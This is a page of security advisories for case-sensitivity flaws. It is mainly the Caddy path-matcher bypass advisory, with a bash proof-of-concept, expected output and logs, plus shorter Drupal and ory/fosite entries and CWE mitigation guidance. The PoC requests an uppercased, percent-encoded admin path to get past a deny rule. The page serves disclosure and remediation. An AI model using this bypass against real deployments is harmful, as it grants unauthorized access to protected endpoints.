{"level":"info","ts":1770589160.2764065,"logger":"http.log.access","msg":"handled request","request":{"remote_ip":"127.0.0.1","remote_port":"57126","client_ip":"127.0.0.1","proto":"HTTP/1.1","method":"GET","host":"example.test","uri":"/admin%2Fpanel","headers":{"User-Agent":["curl/8.15.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.000017493,"size":4,"status":403,"resp_headers":{"Server":["Caddy"],"Content-Type":["text/plain; charset=utf-8"]}}
{"level":"info","ts":1770589160.2943857,"logger":"http.log.access","msg":"handled request","request":{"remote_ip":"127.0.0.1","remote_port":"57136","client_ip":"127.0.0.1","proto":"HTTP/1.1","method":"GET","host":"example.test","uri":"/ADMIN%2Fpanel","headers":{"User-Agent":["curl/8.15.0"],"Accept":["*/*"]}},"bytes_read":0,"user_id":"","duration":0.000066734,"size":5,"status":200,"resp_headers":{"Server":["Caddy"],"Content-Type":["text/plain; charset=utf-8"]}}
{"level":"info","ts":1770589160.2966497,"msg":"shutting down apps, then terminating","signal":"SIGTERM"}
{"level":"warn","ts":1770589160.2966666,"msg":"exiting; byeee!! 👋","signal":"SIGTERM"}
{"level":"debug","ts":1770589160.296728,"logger":"events","msg":"event","name":"stopping","id":"aefb0a2f-0a81-4587-9f79-e530883c3fe1","origin":"","data":null}
{"level":"info","ts":1770589160.2967443,"logger":"http","msg":"servers shutting down with eternal grace period"}
{"level":"info","ts":1770589160.2968848,"logger":"admin","msg":"stopped previous server","address":"localhost:2019"}
{"level":"info","ts":1770589160.2968912,"msg":"shutdown complete","signal":"SIGTERM","exit_code":0}
Impact
This is a route/auth bypass in Caddy's path-matching logic for patterns that include escape sequences. Deployments that use path matchers with %xx patterns to block or protect sensitive endpoints (including encoded-path variants such as encoded slashes) can be bypassed by changing the casing of the request path, allowing unauthorized access to sensitive endpoints behind Caddy depending on upstream configuration.
The reproduction is minimal per the reporting guidance. In a realistic "full" scenario, a deployment may block %xx variants like path /admin%2Fpanel, otherwise proxying. If the backend is case-insensitive/normalizing, /ADMIN%2Fpanel maps to the same handler; Caddy’s %-pattern match misses due to case, so the block is skipped and the request falls through.
AI Use Disclosure
A custom AI agent pipeline was used to discover the vulnerability, after which was manually reproduced and validated each step. The entire report was ran through an LLM to make sure nothing obvious was missed.
Disclosure/crediting
Asim Viladi Oglu Manizada
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/caddyserver/caddy/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27587"
],
"database_specific": {
"cwe_ids": [
"CWE-178"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T20:31:31Z",
"nvd_published_at": "2026-02-24T17:29:03Z",
"severity": "HIGH"
},
"details": "### Summary\nCaddy\u0027s HTTP `path` request matcher is intended to be case-insensitive, but when the match pattern contains percent-escape sequences (`%xx`) it compares against the request\u0027s escaped path without lowercasing. An attacker can bypass path-based routing and any access controls attached to that route by changing the casing of the request path.\n\n### Details\nIn Caddy `v2.10.2`, `MatchPath` is explicitly designed to be case-insensitive and lowercases match patterns during provisioning:\n\n- `modules/caddyhttp/matchers.go`: rationale captured in the `MatchPath` comment.\n- `MatchPath.Provision` lowercases configured patterns via `strings.ToLower`.\n- `MatchPath.MatchWithError` lowercases the request path for the normal matching path: `reqPath := strings.ToLower(r.URL.Path)`.\n\nBut when a match pattern contains a percent sign (`%`), `MatchPath.MatchWithError` switches to \"escaped space\" matching and builds the comparison string from `r.URL.EscapedPath()`:\n\n- `reqPathForPattern := CleanPath(r.URL.EscapedPath(), mergeSlashes)`\n- If it doesn\u0027t match, it `continue`s (skipping the remaining matching logic for that pattern).\n\nBecause `r.URL.EscapedPath()` is not lowercased, case differences in the request path can cause the escaped-space match to fail even though `MatchPath` is meant to be case-insensitive. For example, with a pattern of `/admin%2Fpanel`:\n\n- Requesting `/admin%2Fpanel` matches and can be denied as intended.\n- Requesting `/ADMIN%2Fpanel` does not match and falls through to other routes/handlers.\n\n#### Suggested fix\n- In the `%`-pattern matching path, ensure the effective string passed to `path.Match` is lowercased (same as the normal branch).\n - Simplest seems to lowercase the constructed string in `matchPatternWithEscapeSequence` right before `path.Match`.\n\nReproduced on:\n- Stable release: `v2.10.2` -- this is the release referenced in the reproduction below.\n- Dev build: `v2.11.0-beta.2`.\n- Master tip: commit `58968b3fd38cacbf4b5e07cc8c8be27696dce60f`.\n\n### PoC\nPrereqs:\n- bash, curl\n- A pre-built Caddy binary available at `/opt/caddy-2.10.2/caddy` (edit `CADDY_BIN` in the script if needed)\n\n\n\u003cdetails\u003e\n\u003csummary\u003eScript (Click to expand)\u003c/summary\u003e\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nCADDY_BIN=\"/opt/caddy-2.10.2/caddy\"\nHOST=\"127.0.0.1\"\nPORT=\"8080\"\n\nTMPDIR=\"$(mktemp -d)\"\nCADDYFILE=\"${TMPDIR}/Caddyfile\"\nLOG=\"${TMPDIR}/caddy.log\"\n\ncleanup() {\n if [ -n \"${CADDY_PID:-}\" ] \u0026\u0026 kill -0 \"${CADDY_PID}\" 2\u003e/dev/null; then\n kill \"${CADDY_PID}\" 2\u003e/dev/null || true\n wait \"${CADDY_PID}\" 2\u003e/dev/null || true\n fi\n rm -rf \"${TMPDIR}\" 2\u003e/dev/null || true\n}\ntrap cleanup EXIT\n\nif [ ! -x \"${CADDY_BIN}\" ]; then\n echo \"error: missing caddy binary at ${CADDY_BIN}\" \u003e\u00262\n exit 2\nfi\n\necho \"== Caddy version ==\"\n\"${CADDY_BIN}\" version\n\ncat \u003e\"${CADDYFILE}\" \u003c\u003cEOF\n{\n debug\n}\n\n:${PORT} {\n log\n @block {\n path /admin%2Fpanel\n }\n respond @block \"DENY\" 403\n respond \"ALLOW\" 200\n}\nEOF\n\necho\necho \"== Caddyfile ==\"\ncat \"${CADDYFILE}\"\n\necho\necho \"== Start Caddy (debug + capture logs) ==\"\necho \"cmd: ${CADDY_BIN} run --config ${CADDYFILE} --adapter caddyfile\"\n\"${CADDY_BIN}\" run --config \"${CADDYFILE}\" --adapter caddyfile \u003e\"${LOG}\" 2\u003e\u00261 \u0026\nCADDY_PID=\"$!\"\n\nsleep 2\n\necho\necho \"== Request 1 (baseline - expect deny) ==\"\necho \"cmd: curl -v -H \u0027Host: example.test\u0027 http://${HOST}:${PORT}/admin%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/admin%2Fpanel\" 2\u003e\u00261 || true\n\necho\necho \"== Request 2 (BYPASS - expect allow) ==\"\necho \"cmd: curl -v -H \u0027Host: example.test\u0027 http://${HOST}:${PORT}/ADMIN%2Fpanel\"\ncurl -v -H \"Host: example.test\" \"http://${HOST}:${PORT}/ADMIN%2Fpanel\" 2\u003e\u00261 || true\n\necho\necho \"== Stop Caddy ==\"\nkill \"${CADDY_PID}\" 2\u003e/dev/null || true\nwait \"${CADDY_PID}\" 2\u003e/dev/null || true\n\necho\necho \"== Full Caddy debug log ==\"\ncat \"${LOG}\"\n```\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003eExpected output (Click to expand)\u003c/summary\u003e\n\n```bash\n== Caddy version ==\nv2.10.2 h1:g/gTYjGMD0dec+UgMw8SnfmJ3I9+M2TdvoRL/Ovu6U8=\n\n== Caddyfile ==\n{\n debug\n}\n\n:8080 {\n log\n @block {\n path /admin%2Fpanel\n }\n respond @block \"DENY\" 403\n respond \"ALLOW\" 200\n}\n\n== Start Caddy (debug + capture logs) ==\ncmd: /opt/caddy-2.10.2/caddy run --config /tmp/tmp.GXiRbxOnBN/Caddyfile --adapter caddyfile\n\n== Request 1 (baseline - expect deny) ==\ncmd: curl -v -H \u0027Host: example.test\u0027 http://127.0.0.1:8080/admin%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n\u003e GET /admin%2Fpanel HTTP/1.1\n\u003e Host: example.test\n\u003e User-Agent: curl/8.15.0\n\u003e Accept: */*\n\u003e\n* Request completely sent off\n\u003c HTTP/1.1 403 Forbidden\n\u003c Content-Type: text/plain; charset=utf-8\n\u003c Server: Caddy\n\u003c Date: Sun, 08 Feb 2026 22:19:20 GMT\n\u003c Content-Length: 4\n\u003c\n* Connection #0 to host 127.0.0.1 left intact\nDENY\n== Request 2 (BYPASS - expect allow) ==\ncmd: curl -v -H \u0027Host: example.test\u0027 http://127.0.0.1:8080/ADMIN%2Fpanel\n* Trying 127.0.0.1:8080...\n* Connected to 127.0.0.1 (127.0.0.1) port 8080\n* using HTTP/1.x\n\u003e GET /ADMIN%2Fpanel HTTP/1.1\n\u003e Host: example.test\n\u003e User-Agent: curl/8.15.0\n\u003e Accept: */*\n\u003e\n* Request completely sent off\n\u003c HTTP/1.1 200 OK\n\u003c Content-Type: text/plain; charset=utf-8\n\u003c Server: Caddy\n\u003c Date: Sun, 08 Feb 2026 22:19:20 GMT\n\u003c Content-Length: 5\n\u003c\n* Connection #0 to host 127.0.0.1 left intact\nALLOW\n== Stop Caddy ==\n\n== Full Caddy debug log ==\n{\"level\":\"info\",\"ts\":1770589158.3687892,\"msg\":\"maxprocs: Leaving GOMAXPROCS=4: CPU quota undefined\"}\n{\"level\":\"info\",\"ts\":1770589158.3690693,\"msg\":\"GOMEMLIMIT is updated\",\"package\":\"github.com/KimMachineGun/automemlimit/memlimit\",\"GOMEMLIMIT\":1844136345,\"previous\":9223372036854775807}\n{\"level\":\"info\",\"ts\":1770589158.369109,\"msg\":\"using config from file\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\"}\n{\"level\":\"info\",\"ts\":1770589158.3704133,\"msg\":\"adapted config to JSON\",\"adapter\":\"caddyfile\"}\n{\"level\":\"warn\",\"ts\":1770589158.370424,\"msg\":\"Caddyfile input is not formatted; run \u0027caddy fmt --overwrite\u0027 to fix inconsistencies\",\"adapter\":\"caddyfile\",\"file\":\"/tmp/tmp.GXiRbxOnBN/Caddyfile\",\"line\":2}\n{\"level\":\"info\",\"ts\":1770589158.3715324,\"logger\":\"admin\",\"msg\":\"admin endpoint started\",\"address\":\"localhost:2019\",\"enforce_origin\":false,\"origins\":[\"//localhost:2019\",\"//[::1]:2019\",\"//127.0.0.1:2019\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3716462,\"logger\":\"http.auto_https\",\"msg\":\"adjusted config\",\"tls\":{\"automation\":{\"policies\":[{}]}},\"http\":{\"servers\":{\"srv0\":{\"listen\":[\":8080\"],\"routes\":[{\"handle\":[{\"body\":\"DENY\",\"handler\":\"static_response\",\"status_code\":403}]},{\"handle\":[{\"body\":\"ALLOW\",\"handler\":\"static_response\",\"status_code\":200}]}],\"automatic_https\":{},\"logs\":{}}}}}\n{\"level\":\"debug\",\"ts\":1770589158.3718414,\"logger\":\"http\",\"msg\":\"starting server loop\",\"address\":\"[::]:8080\",\"tls\":false,\"http3\":false}\n{\"level\":\"warn\",\"ts\":1770589158.371858,\"logger\":\"http\",\"msg\":\"HTTP/2 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"warn\",\"ts\":1770589158.3718607,\"logger\":\"http\",\"msg\":\"HTTP/3 skipped because it requires TLS\",\"network\":\"tcp\",\"addr\":\":8080\"}\n{\"level\":\"info\",\"ts\":1770589158.3718636,\"logger\":\"http.log\",\"msg\":\"server running\",\"name\":\"srv0\",\"protocols\":[\"h1\",\"h2\",\"h3\"]}\n{\"level\":\"debug\",\"ts\":1770589158.3718896,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"started\",\"id\":\"6bb8b6fe-4980-4a48-9f7e-2146ecd48ce6\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589158.3720388,\"msg\":\"autosaved config (load with --resume flag)\",\"file\":\"/home/vh/.config/caddy/autosave.json\"}\n{\"level\":\"info\",\"ts\":1770589158.3720443,\"msg\":\"serving initial configuration\"}\n{\"level\":\"info\",\"ts\":1770589158.372355,\"logger\":\"tls.cache.maintenance\",\"msg\":\"started background certificate maintenance\",\"cache\":\"0xc00064d180\"}\n{\"level\":\"info\",\"ts\":1770589158.3855736,\"logger\":\"tls\",\"msg\":\"storage cleaning happened too recently; skipping for now\",\"storage\":\"FileStorage:/home/vh/.local/share/caddy\",\"instance\":\"a259f82d-3c7c-4706-9ca8-17456b4af729\",\"try_again\":1770675558.3855705,\"try_again_in\":86399.999999388}\n{\"level\":\"info\",\"ts\":1770589158.3857276,\"logger\":\"tls\",\"msg\":\"finished cleaning storage units\"}\n{\"level\":\"info\",\"ts\":1770589160.2764065,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57126\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/admin%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000017493,\"size\":4,\"status\":403,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2943857,\"logger\":\"http.log.access\",\"msg\":\"handled request\",\"request\":{\"remote_ip\":\"127.0.0.1\",\"remote_port\":\"57136\",\"client_ip\":\"127.0.0.1\",\"proto\":\"HTTP/1.1\",\"method\":\"GET\",\"host\":\"example.test\",\"uri\":\"/ADMIN%2Fpanel\",\"headers\":{\"User-Agent\":[\"curl/8.15.0\"],\"Accept\":[\"*/*\"]}},\"bytes_read\":0,\"user_id\":\"\",\"duration\":0.000066734,\"size\":5,\"status\":200,\"resp_headers\":{\"Server\":[\"Caddy\"],\"Content-Type\":[\"text/plain; charset=utf-8\"]}}\n{\"level\":\"info\",\"ts\":1770589160.2966497,\"msg\":\"shutting down apps, then terminating\",\"signal\":\"SIGTERM\"}\n{\"level\":\"warn\",\"ts\":1770589160.2966666,\"msg\":\"exiting; byeee!! \ud83d\udc4b\",\"signal\":\"SIGTERM\"}\n{\"level\":\"debug\",\"ts\":1770589160.296728,\"logger\":\"events\",\"msg\":\"event\",\"name\":\"stopping\",\"id\":\"aefb0a2f-0a81-4587-9f79-e530883c3fe1\",\"origin\":\"\",\"data\":null}\n{\"level\":\"info\",\"ts\":1770589160.2967443,\"logger\":\"http\",\"msg\":\"servers shutting down with eternal grace period\"}\n{\"level\":\"info\",\"ts\":1770589160.2968848,\"logger\":\"admin\",\"msg\":\"stopped previous server\",\"address\":\"localhost:2019\"}\n{\"level\":\"info\",\"ts\":1770589160.2968912,\"msg\":\"shutdown complete\",\"signal\":\"SIGTERM\",\"exit_code\":0}\n```\n\u003c/details\u003e\n\n\n### Impact\nThis is a route/auth bypass in Caddy\u0027s path-matching logic for patterns that include escape sequences. Deployments that use `path` matchers with `%xx` patterns to block or protect sensitive endpoints (including encoded-path variants such as encoded slashes) can be bypassed by changing the casing of the request path, allowing unauthorized access to sensitive endpoints behind Caddy depending on upstream configuration.\n\nThe reproduction is minimal per the reporting guidance. In a realistic \"full\" scenario, a deployment may block `%xx` variants like `path /admin%2Fpanel`, otherwise proxying. If the backend is case-insensitive/normalizing, `/ADMIN%2Fpanel` maps to the same handler; Caddy\u2019s `%`-pattern match misses due to case, so the block is skipped and the request falls through.\n\n\n### AI Use Disclosure\nA custom AI agent pipeline was used to discover the vulnerability, after which was manually reproduced and validated each step. The entire report was ran through an LLM to make sure nothing obvious was missed.\n\n### Disclosure/crediting\n\nAsim Viladi Oglu Manizada",
"id": "GHSA-g7pc-pc7g-h8jh",
"modified": "2026-02-27T19:53:17Z",
"published": "2026-02-24T20:31:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-g7pc-pc7g-h8jh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27587"
},
{
"type": "WEB",
"url": "https://github.com/caddyserver/caddy/commit/a1081194bfae4e0d8c227ec44aecb95eded55d1e"
},
{
"type": "PACKAGE",
"url": "https://github.com/caddyserver/caddy"
},
{
"type": "WEB",
"url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.1"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4538"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Caddy: MatchPath %xx (escaped-path) branch skips case normalization, enabling path-based route/auth bypass"
}
GHSA-G8FG-X943-8CVW
Vulnerability from github – Published: 2026-03-26 21:31 – Updated: 2026-03-27 15:30Improper Handling of Case Sensitivity vulnerability in Drupal OpenID Connect / OAuth client allows Privilege Escalation.This issue affects OpenID Connect / OAuth client: from 0.0.0 before 1.5.0.
{
"affected": [],
"aliases": [
"CVE-2026-3532"
],
"database_specific": {
"cwe_ids": [
"CWE-178"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-26T21:17:09Z",
"severity": "MODERATE"
},
"details": "Improper Handling of Case Sensitivity vulnerability in Drupal OpenID Connect / OAuth client allows Privilege Escalation.This issue affects OpenID Connect / OAuth client: from 0.0.0 before 1.5.0.",
"id": "GHSA-g8fg-x943-8cvw",
"modified": "2026-03-27T15:30:25Z",
"published": "2026-03-26T21:31:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3532"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2026-027"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-GRFP-Q2MM-HFP6
Vulnerability from github – Published: 2021-05-24 17:00 – Updated: 2021-11-19 14:43Impact
Before version v0.34.1, the OAuth 2.0 Client's registered redirect URLs and the redirect URL provided at the OAuth2 Authorization Endpoint where compared using strings.ToLower while they should have been compared with a simple string match:
- Registering a client with allowed redirect URL
https://example.com/callback - Performing OAuth2 flow and requesting redirect URL
https://example.com/CALLBACK - Instead of an error (invalid redirect URL), the browser is redirected to
https://example.com/CALLBACKwith a potentially successful OAuth2 response, depending on the state of the overall OAuth2 flow (the user might still deny the request for example).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/ory/fosite"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.34.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-15234"
],
"database_specific": {
"cwe_ids": [
"CWE-178",
"CWE-20",
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-21T22:15:37Z",
"nvd_published_at": "2020-10-02T21:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nBefore version v0.34.1, the OAuth 2.0 Client\u0027s registered redirect URLs and the redirect URL provided at the OAuth2 Authorization Endpoint where compared using `strings.ToLower` while they should have been compared with a simple string match:\n\n1. Registering a client with allowed redirect URL `https://example.com/callback`\n2. Performing OAuth2 flow and requesting redirect URL `https://example.com/CALLBACK`\n3. Instead of an error (invalid redirect URL), the browser is redirected to `https://example.com/CALLBACK` with a potentially successful OAuth2 response, depending on the state of the overall OAuth2 flow (the user might still deny the request for example).",
"id": "GHSA-grfp-q2mm-hfp6",
"modified": "2021-11-19T14:43:47Z",
"published": "2021-05-24T17:00:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ory/fosite/security/advisories/GHSA-grfp-q2mm-hfp6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15234"
},
{
"type": "WEB",
"url": "https://github.com/ory/fosite/commit/cdee51ebe721bfc8acca0fd0b86b030ca70867bf"
},
{
"type": "PACKAGE",
"url": "https://github.com/ory/fosite"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Redirect URL matching ignores character casing"
}
Mitigation MIT-44
Strategy: Input Validation
Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-20
Strategy: Input Validation
Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
No CAPEC attack patterns related to this CWE.